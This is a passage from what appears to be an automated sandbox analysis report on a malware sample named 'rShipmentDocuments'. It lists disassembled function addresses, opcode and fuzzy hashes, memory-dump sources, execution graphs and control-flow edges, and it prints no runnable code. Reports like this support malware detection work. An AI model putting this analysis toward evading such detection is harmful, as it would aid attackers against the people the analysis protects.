                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction ID: 379c7830f2362e129389306a6e719d3f37ca641c40e4bfdeb21f02f76c39122a
                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction Fuzzy Hash: 8611AF76504280CFDB16CF58D5C4B16FF72FB84318F24C6A9D9490B65AC336D45ACBA1
                                                      Function 0171D3D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727439582.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_171d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction ID: 2e9c8eb70add51688afd0c8c4ac93d2c862ab6d785ebb4a09fb3b92661334dbf
                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction Fuzzy Hash: B911CD72444240CFDB16CF48D5C4B56BF62FB94224F24C6A9DD090A25AC33AE45ACBA1
                                                      Function 0172D017 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727503411.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_172d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: 6dda2efb86ea8ea6be7353b0bec10821f913f0c565bba2bf9fbd7b8669d5346c
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: C911D075504280CFDB22CF54D5C4B15FF61FB44314F24C6AAD8494B666C33AD40BCB61
                                                      Function 0172D1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727503411.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_172d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: 19b65c7c97821a56a05ef4f24630e059c34183730f08b5e834745d395539e84f
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: 9211BB75508280DFDB12CF54C5C4B15FFA1FB85224F24C6AAD8498B296C33AD40ACB61

                                                      Non-executed Functions

                                                      Function 058DA8B0 Relevance: .3, Instructions: 266COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79d799e7775335bc403a0def0d622c1134bf2e908f511c588cf4cf5969c4695f
                                                      • Instruction ID: 8baa7abf8a130cb16bf100a4889c77f4924fb5cd96c713dd0dfebded62467a6d
                                                      • Opcode Fuzzy Hash: 79d799e7775335bc403a0def0d622c1134bf2e908f511c588cf4cf5969c4695f
                                                      • Instruction Fuzzy Hash: C7D1F831D2065A8ACB00EBA8D994A9DF771FFD5300F50C79AE4497B214FB706AC9CB81
                                                      Function 0177E06C Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 544d27a0f5ba563e0798917aee2e286140cf32c9260eba26d9d5cceb077167cf
                                                      • Instruction ID: c71beafbebb68326d893ba3d5d369f7aa0caa333bbae635e965ea9db54d74b9c
                                                      • Opcode Fuzzy Hash: 544d27a0f5ba563e0798917aee2e286140cf32c9260eba26d9d5cceb077167cf
                                                      • Instruction Fuzzy Hash: 20A15E32A00216CFCF15DFB8C94459EF7B2FF85300F2585AAE915AB225DB31E955CB50
                                                      Function 058DA8C0 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c0c1e0c07539f785e97a4d990e7ab270d6b5a4413827f5b31a4d710168ad41a
                                                      • Instruction ID: 9611fa27352d53035792362f0ffa509dad7cc51527575e886a3c99941a5aca1b
                                                      • Opcode Fuzzy Hash: 8c0c1e0c07539f785e97a4d990e7ab270d6b5a4413827f5b31a4d710168ad41a
                                                      • Instruction Fuzzy Hash: 19D1F831D2065A8ACB00EBA8D994A9DF7B1FFD5300F50C79AE5493B214FB706AC5CB81
                                                      Function 058D9518 Relevance: .1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50719ac09746ce2d62af6946f4224732a010a3c60bd1495459e604082100b523
                                                      • Instruction ID: 7bfe2198c500c80ac1efa1fafdef265caedc7a0a2c792d6dc7ad39b5070a2a5b
                                                      • Opcode Fuzzy Hash: 50719ac09746ce2d62af6946f4224732a010a3c60bd1495459e604082100b523
                                                      • Instruction Fuzzy Hash: 18415A70E0520A9FCB04CFA9E5445AEFBF2FF88344F10956AD811E7264E7749A01CF55

                                                      Execution Graph

                                                      Execution Coverage:16.3%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:27.3%
                                                      Total number of Nodes:44
                                                      Total number of Limit Nodes:9
                                                      execution_graph 19743 68f9c18 19744 68f9c1f 19743->19744 19746 68f9c25 19743->19746 19744->19746 19748 68f9fa6 19744->19748 19749 68f9328 19744->19749 19747 68f9328 LdrInitializeThunk 19747->19748 19748->19746 19748->19747 19750 68f933a 19749->19750 19752 68f933f 19749->19752 19750->19748 19751 68f9a69 LdrInitializeThunk 19751->19750 19752->19750 19752->19751 19753 2a3e018 19754 2a3e024 19753->19754 19762 68f2970 19754->19762 19756 2a3e109 19773 68ffc5e 19756->19773 19777 68ffc68 19756->19777 19757 2a3e61f 19763 68f2992 19762->19763 19764 2a3e0c3 19763->19764 19768 68f9328 LdrInitializeThunk 19763->19768 19781 68f992c 19763->19781 19787 68f9318 19763->19787 19793 68f9548 19763->19793 19769 68ff3b8 19764->19769 19768->19764 19770 68ff3da 19769->19770 19771 68f9548 2 API calls 19770->19771 19772 68ff4a4 19770->19772 19771->19772 19772->19756 19774 68ffc8a 19773->19774 19775 68f9548 2 API calls 19774->19775 19776 68ffd3a 19774->19776 19775->19776 19776->19757 19778 68ffc8a 19777->19778 19779 68f9548 2 API calls 19778->19779 19780 68ffd3a 19778->19780 19779->19780 19780->19757 19785 68f97e3 19781->19785 19782 68f9924 LdrInitializeThunk 19784 68f9a81 19782->19784 19784->19764 19785->19782 19786 68f9328 LdrInitializeThunk 19785->19786 19786->19785 19788 68f933a 19787->19788 19792 68f933f 19787->19792 19788->19764 19789 68f9924 LdrInitializeThunk 19789->19788 19791 68f9328 LdrInitializeThunk 19791->19792 19792->19788 19792->19789 19792->19791 19798 68f9579 19793->19798 19794 68f96d9 19794->19764 19795 68f9924 LdrInitializeThunk 19795->19794 19797 68f9328 LdrInitializeThunk 19797->19798 19798->19794 19798->19795 19798->19797

                                                      Executed Functions

                                                      Function 02A37118 Relevance: 6.6, Strings: 5, Instructions: 349COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 257 2a37118-2a3713b 258 2a37146-2a37166 257->258 259 2a3713d-2a37143 257->259 262 2a37168 258->262 263 2a3716d-2a37174 258->263 259->258 264 2a374fc-2a37505 262->264 265 2a37176-2a37181 263->265 266 2a37187-2a3719a 265->266 267 2a3750d-2a37519 265->267 272 2a371b0-2a371cb 266->272 273 2a3719c-2a371aa 266->273 270 2a3751b-2a37521 267->270 271 2a374be-2a374c0 267->271 276 2a37523-2a37549 270->276 277 2a374c6-2a374cb 270->277 274 2a374e2-2a374e4 271->274 275 2a374c2-2a374c4 271->275 286 2a371ef-2a371f2 272->286 287 2a371cd-2a371d3 272->287 273->272 283 2a37484-2a3748b 273->283 281 2a374e6-2a374e9 274->281 282 2a37508 274->282 275->277 279 2a374d3-2a374d9 275->279 288 2a37552-2a37556 276->288 289 2a3754b-2a37550 276->289 277->279 279->267 285 2a374db-2a374e0 279->285 294 2a374f0-2a374f3 281->294 282->267 283->264 293 2a3748d-2a3748f 283->293 285->274 290 2a374b6-2a374b9 285->290 295 2a371f8-2a371fb 286->295 296 2a3734c-2a37352 286->296 291 2a371d5 287->291 292 2a371dc-2a371df 287->292 297 2a3755c-2a3755d 288->297 289->297 290->282 306 2a374bb 290->306 291->292 291->296 298 2a37212-2a37218 291->298 299 2a3743e-2a37441 291->299 292->298 300 2a371e1-2a371e4 292->300 301 2a37491-2a37496 293->301 302 2a3749e-2a374a4 293->302 294->282 303 2a374f5-2a374fa 294->303 295->296 305 2a37201-2a37207 295->305 296->299 304 2a37358-2a3735d 296->304 311 2a3721a-2a3721c 298->311 312 2a3721e-2a37220 298->312 299->282 313 2a37447-2a3744d 299->313 307 2a371ea 300->307 308 2a3727e-2a37284 300->308 301->302 302->267 309 2a374a6-2a374ab 302->309 303->264 303->293 304->299 305->296 310 2a3720d 305->310 306->271 307->299 308->299 315 2a3728a-2a37290 308->315 309->294 314 2a374ad-2a374b2 309->314 310->299 316 2a3722a-2a37233 311->316 312->316 317 2a37472-2a37476 313->317 318 2a3744f-2a37457 313->318 314->282 323 2a374b4 314->323 324 2a37292-2a37294 315->324 325 2a37296-2a37298 315->325 320 2a37246-2a3726e 316->320 321 2a37235-2a37240 316->321 317->283 322 2a37478-2a3747e 317->322 318->267 319 2a3745d-2a3746c 318->319 319->272 319->317 337 2a37362-2a37398 320->337 338 2a37274-2a37279 320->338 321->299 321->320 322->265 322->283 323->306 326 2a372a2-2a372b9 324->326 325->326 331 2a372e4-2a3730b 326->331 332 2a372bb-2a372d4 326->332 331->282 341 2a37311-2a37314 331->341 332->337 342 2a372da-2a372df 332->342 345 2a373a5-2a373ad 337->345 346 2a3739a-2a3739e 337->346 338->337 341->282 344 2a3731a-2a37343 341->344 342->337 344->337 361 2a37345-2a3734a 344->361 345->282 347 2a373b3-2a373b8 345->347 348 2a373a0-2a373a3 346->348 349 2a373bd-2a373c1 346->349 347->299 348->345 348->349 351 2a373c3-2a373c9 349->351 352 2a373e0-2a373e4 349->352 351->352 353 2a373cb-2a373d3 351->353 354 2a373e6-2a373ec 352->354 355 2a373ee-2a3740d call 2a376f1 352->355 353->282 357 2a373d9-2a373de 353->357 354->355 358 2a37413-2a37417 354->358 355->358 357->299 358->299 359 2a37419-2a37435 358->359 359->299 361->337
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                      • API String ID: 0-2525668591
                                                      • Opcode ID: 3014f164fe4d1f186ae95a10d1b0fca181fb4a184feb2dedaca2414e1f1823bb
                                                      • Instruction ID: da066856390e61ef9b3f9b2f300f8e1b9e00a7a663e10194462894a0410f0b8c
                                                      • Opcode Fuzzy Hash: 3014f164fe4d1f186ae95a10d1b0fca181fb4a184feb2dedaca2414e1f1823bb
                                                      • Instruction Fuzzy Hash: 0AE12AB1A00119DFCB16CFA9DC84AADFBF2BF88354F658465F815AB265DB30E841CB50
                                                      Function 02A3C148 Relevance: 6.5, Strings: 5, Instructions: 225COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 363 2a3c148-2a3c158 364 2a3c184 363->364 365 2a3c15a-2a3c172 363->365 366 2a3c186-2a3c18a 364->366 369 2a3c174-2a3c179 365->369 370 2a3c17b-2a3c17e 365->370 369->366 371 2a3c180-2a3c182 370->371 372 2a3c18b-2a3c199 370->372 371->364 371->365 374 2a3c19b-2a3c1a1 372->374 375 2a3c1be-2a3c1c1 372->375 376 2a3c1a3-2a3c1bd 374->376 377 2a3c1c6-2a3c1c8 374->377 375->377 376->375 378 2a3c1ca 377->378 379 2a3c1cf-2a3c2ac call 2a341a0 call 2a33cc0 377->379 378->379 389 2a3c2b3-2a3c2d4 call 2a35658 379->389 390 2a3c2ae 379->390 392 2a3c2d9-2a3c2e4 389->392 390->389 393 2a3c2e6 392->393 394 2a3c2eb-2a3c2ef 392->394 393->394 395 2a3c2f1-2a3c2f2 394->395 396 2a3c2f4-2a3c2fb 394->396 397 2a3c313-2a3c357 395->397 398 2a3c302-2a3c310 396->398 399 2a3c2fd 396->399 403 2a3c3bd-2a3c3d4 397->403 398->397 399->398 405 2a3c3d6-2a3c3fb 403->405 406 2a3c359-2a3c36f 403->406 412 2a3c413 405->412 413 2a3c3fd-2a3c412 405->413 410 2a3c371-2a3c37d 406->410 411 2a3c399 406->411 414 2a3c387-2a3c38d 410->414 415 2a3c37f-2a3c385 410->415 416 2a3c39f-2a3c3bc 411->416 413->412 417 2a3c397 414->417 415->417 416->403 417->416
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 4ea67ad1f1b2e3332a490256dfaa82c53b588ff69d431216161a031f17af70b0
                                                      • Instruction ID: 82dceeed55a648ded2500ddcaf9f7301a75f0744e0c2aa85d9793e732a4b422c
                                                      • Opcode Fuzzy Hash: 4ea67ad1f1b2e3332a490256dfaa82c53b588ff69d431216161a031f17af70b0
                                                      • Instruction Fuzzy Hash: CAA1F674E00218DFDB15DFAAD884A9DFBF2BF89310F14806AE409AB365DB349945CF50
                                                      Function 02A35362 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 421 2a35362-2a35364 422 2a35366-2a353a0 421->422 423 2a353c4-2a35484 call 2a341a0 call 2a33cc0 421->423 424 2a353a2 422->424 425 2a353a7-2a353c2 422->425 435 2a35486 423->435 436 2a3548b-2a354a9 423->436 424->425 425->423 435->436 466 2a354ac call 2a35649 436->466 467 2a354ac call 2a35658 436->467 437 2a354b2-2a354bd 438 2a354c4-2a354c8 437->438 439 2a354bf 437->439 440 2a354ca-2a354cb 438->440 441 2a354cd-2a354d4 438->441 439->438 442 2a354ec-2a35530 440->442 443 2a354d6 441->443 444 2a354db-2a354e9 441->444 448 2a35596-2a355ad 442->448 443->444 444->442 450 2a35532-2a35548 448->450 451 2a355af-2a355d4 448->451 455 2a35572 450->455 456 2a3554a-2a35556 450->456 457 2a355d6-2a355eb 451->457 458 2a355ec 451->458 461 2a35578-2a35595 455->461 459 2a35560-2a35566 456->459 460 2a35558-2a3555e 456->460 457->458 462 2a35570 459->462 460->462 461->448 462->461 466->437 467->437
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 7440f7252be5473cf6302b1bbdc84f692786c75be56922eb0a9125a9bc75a362
                                                      • Instruction ID: 82a5586cd7bda9d86393ab29115d22a2804458f18e8f290a0f4908ee431a2cce
                                                      • Opcode Fuzzy Hash: 7440f7252be5473cf6302b1bbdc84f692786c75be56922eb0a9125a9bc75a362
                                                      • Instruction Fuzzy Hash: 1B91D675E00218CFDB19CFA9D984A9DBBF2BF89300F14C069E419AB365DB349985CF50
                                                      Function 02A3C468 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 468 2a3c468-2a3c498 469 2a3c49a 468->469 470 2a3c49f-2a3c57c call 2a341a0 call 2a33cc0 468->470 469->470 480 2a3c583-2a3c5a4 call 2a35658 470->480 481 2a3c57e 470->481 483 2a3c5a9-2a3c5b4 480->483 481->480 484 2a3c5b6 483->484 485 2a3c5bb-2a3c5bf 483->485 484->485 486 2a3c5c1-2a3c5c2 485->486 487 2a3c5c4-2a3c5cb 485->487 490 2a3c5e3-2a3c627 486->490 488 2a3c5d2-2a3c5e0 487->488 489 2a3c5cd 487->489 488->490 489->488 494 2a3c68d-2a3c6a4 490->494 496 2a3c6a6-2a3c6cb 494->496 497 2a3c629-2a3c63f 494->497 504 2a3c6e3 496->504 505 2a3c6cd-2a3c6e2 496->505 501 2a3c641-2a3c64d 497->501 502 2a3c669 497->502 506 2a3c657-2a3c65d 501->506 507 2a3c64f-2a3c655 501->507 503 2a3c66f-2a3c68c 502->503 503->494 505->504 508 2a3c667 506->508 507->508 508->503
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 5fce64fd6c18bdc8d9e2dd4f08bdae3d9baa15e2ff355e74210d2f72463c0fac
                                                      • Instruction ID: 270e26c4f4bb74ad98b5ad1ee8a7ac8bcae669dd186aba7ad1e5e4c2e03e77f0
                                                      • Opcode Fuzzy Hash: 5fce64fd6c18bdc8d9e2dd4f08bdae3d9baa15e2ff355e74210d2f72463c0fac
                                                      • Instruction Fuzzy Hash: FA81C274E00218CFDB55DFAAD984A9DBBF2BF88310F14D06AE419AB365DB349981CF50
                                                      Function 02A3CA08 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 512 2a3ca08-2a3ca38 514 2a3ca3a 512->514 515 2a3ca3f-2a3cb1c call 2a341a0 call 2a33cc0 512->515 514->515 525 2a3cb23-2a3cb44 call 2a35658 515->525 526 2a3cb1e 515->526 528 2a3cb49-2a3cb54 525->528 526->525 529 2a3cb56 528->529 530 2a3cb5b-2a3cb5f 528->530 529->530 531 2a3cb61-2a3cb62 530->531 532 2a3cb64-2a3cb6b 530->532 533 2a3cb83-2a3cbc7 531->533 534 2a3cb72-2a3cb80 532->534 535 2a3cb6d 532->535 539 2a3cc2d-2a3cc44 533->539 534->533 535->534 541 2a3cc46-2a3cc6b 539->541 542 2a3cbc9-2a3cbdf 539->542 548 2a3cc83 541->548 549 2a3cc6d-2a3cc82 541->549 546 2a3cbe1-2a3cbed 542->546 547 2a3cc09 542->547 550 2a3cbf7-2a3cbfd 546->550 551 2a3cbef-2a3cbf5 546->551 552 2a3cc0f-2a3cc2c 547->552 549->548 553 2a3cc07 550->553 551->553 552->539 553->552
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: af1da54a1f56697337879f760266ec75388dc587325f2e71185a79411bbc5462
                                                      • Instruction ID: 52a6cc1f5a85f4cdac7e202d7e94cda891bc9b4504ef63a5a2c0f4a8b18f776a
                                                      • Opcode Fuzzy Hash: af1da54a1f56697337879f760266ec75388dc587325f2e71185a79411bbc5462
                                                      • Instruction Fuzzy Hash: 6C81B274E00218CFDB54DFAAD984A9DBBF2BF88310F14C06AE419AB365DB349985CF50
                                                      Function 02A3D278 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 645 2a3d278-2a3d2a8 646 2a3d2aa 645->646 647 2a3d2af-2a3d38c call 2a341a0 call 2a33cc0 645->647 646->647 657 2a3d393-2a3d3b4 call 2a35658 647->657 658 2a3d38e 647->658 660 2a3d3b9-2a3d3c4 657->660 658->657 661 2a3d3c6 660->661 662 2a3d3cb-2a3d3cf 660->662 661->662 663 2a3d3d1-2a3d3d2 662->663 664 2a3d3d4-2a3d3db 662->664 665 2a3d3f3-2a3d437 663->665 666 2a3d3e2-2a3d3f0 664->666 667 2a3d3dd 664->667 671 2a3d49d-2a3d4b4 665->671 666->665 667->666 673 2a3d4b6-2a3d4db 671->673 674 2a3d439-2a3d44f 671->674 680 2a3d4f3 673->680 681 2a3d4dd-2a3d4f2 673->681 678 2a3d451-2a3d45d 674->678 679 2a3d479 674->679 682 2a3d467-2a3d46d 678->682 683 2a3d45f-2a3d465 678->683 684 2a3d47f-2a3d49c 679->684 681->680 685 2a3d477 682->685 683->685 684->671 685->684
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: c486b68b1b369d59195e807b729d63816e81866f4a0b5d03ac807e95c4571a66
                                                      • Instruction ID: 6b5563855441ab75a69a7c2f66f32d6c7c9cd78879d584ba5bf25bf102e95a41
                                                      • Opcode Fuzzy Hash: c486b68b1b369d59195e807b729d63816e81866f4a0b5d03ac807e95c4571a66
                                                      • Instruction Fuzzy Hash: D481B474E00618CFDB58DFAAD984A9DBBF2BF88310F14C069E419AB365DB349985CF10
                                                      Function 02A3C738 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 557 2a3c738-2a3c768 558 2a3c76a 557->558 559 2a3c76f-2a3c84c call 2a341a0 call 2a33cc0 557->559 558->559 569 2a3c853-2a3c874 call 2a35658 559->569 570 2a3c84e 559->570 572 2a3c879-2a3c884 569->572 570->569 573 2a3c886 572->573 574 2a3c88b-2a3c88f 572->574 573->574 575 2a3c891-2a3c892 574->575 576 2a3c894-2a3c89b 574->576 579 2a3c8b3-2a3c8f7 575->579 577 2a3c8a2-2a3c8b0 576->577 578 2a3c89d 576->578 577->579 578->577 583 2a3c95d-2a3c974 579->583 585 2a3c976-2a3c99b 583->585 586 2a3c8f9-2a3c90f 583->586 593 2a3c9b3 585->593 594 2a3c99d-2a3c9b2 585->594 590 2a3c911-2a3c91d 586->590 591 2a3c939 586->591 595 2a3c927-2a3c92d 590->595 596 2a3c91f-2a3c925 590->596 592 2a3c93f-2a3c95c 591->592 592->583 594->593 597 2a3c937 595->597 596->597 597->592
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 9f459acc4efff3c1eba80d66313e474073436c450bbff7d1c03248f6d4da1593
                                                      • Instruction ID: e576b38d39a35b3baba00a923e5d24ea5b17e51e23d588a5dd45854e761d57ac
                                                      • Opcode Fuzzy Hash: 9f459acc4efff3c1eba80d66313e474073436c450bbff7d1c03248f6d4da1593
                                                      • Instruction Fuzzy Hash: 2681A074E00218CFDB15DFAAD984A9DBBF2BF88310F14C06AE419AB365DB349981CF50
                                                      Function 02A3CCD8 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 601 2a3ccd8-2a3cd08 602 2a3cd0a 601->602 603 2a3cd0f-2a3cdec call 2a341a0 call 2a33cc0 601->603 602->603 613 2a3cdf3-2a3ce14 call 2a35658 603->613 614 2a3cdee 603->614 616 2a3ce19-2a3ce24 613->616 614->613 617 2a3ce26 616->617 618 2a3ce2b-2a3ce2f 616->618 617->618 619 2a3ce31-2a3ce32 618->619 620 2a3ce34-2a3ce3b 618->620 623 2a3ce53-2a3ce97 619->623 621 2a3ce42-2a3ce50 620->621 622 2a3ce3d 620->622 621->623 622->621 627 2a3cefd-2a3cf14 623->627 629 2a3cf16-2a3cf3b 627->629 630 2a3ce99-2a3ceaf 627->630 637 2a3cf53 629->637 638 2a3cf3d-2a3cf52 629->638 634 2a3ceb1-2a3cebd 630->634 635 2a3ced9 630->635 639 2a3cec7-2a3cecd 634->639 640 2a3cebf-2a3cec5 634->640 636 2a3cedf-2a3cefc 635->636 636->627 638->637 641 2a3ced7 639->641 640->641 641->636
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 02062cb7561a68aa00914c4ab1e0d8ddd61dacd830dfbe7e98908b8bc92a12fe
                                                      • Instruction ID: d0d97f6818f1bb9f589f866ed1ab240a8415c18c78d96959d54ad8a4ff244e2b
                                                      • Opcode Fuzzy Hash: 02062cb7561a68aa00914c4ab1e0d8ddd61dacd830dfbe7e98908b8bc92a12fe
                                                      • Instruction Fuzzy Hash: D181B674E00218DFDB54DFA9D984A9DBBF2BF88310F24C06AE419AB365DB349985CF50
                                                      Function 02A3CFAA Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
